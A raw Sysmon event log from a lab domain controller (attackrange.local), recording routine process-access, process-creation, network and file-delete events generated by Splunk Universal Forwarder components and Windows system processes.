12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.969{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000010390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:01.461{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53693-false10.0.1.12-8000- 23542300x800000000000000010389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.140{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BAFEBD8075DC99EC3E6F73625A409E,SHA256=F78665DC755C42A36D79A4661FDF73ABB2F22666394311BA52C694C421FB81E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.765{266CAFBE-6623-6064-6101-00000000AE01}55561156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.609{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.610{266CAFBE-6623-6064-6101-00000000AE01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:03.171{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A5D47E97FED23CB69B924261E9595F,SHA256=3F0E2CA2AAC23C771117D2C97420F6DF6AD1D23D8EC661DD49D0FC671D4EEDCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.719{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.265{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C6F2FD7778AC0FDE0220EDE973FAAB,SHA256=A94F9D8E14E5CCCB52EDA3BB3C9BBF9A7C39173DC3478EA080D54215D3959EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:05.280{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BE1209455CCF72E3CB1040F06364825,SHA256=CD38B6482D8995D8A2B0775C38FA842B9702D3621171FB60FD6615EC77114B43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.499{266CAFBE-6626-6064-6301-00000000AE01}43206944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EC18367F2856F132E0B9053AE82518C,SHA256=5D063358A537CACF022CF2936AAD2EB5672A86FAAFF6331894267589029D9C3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 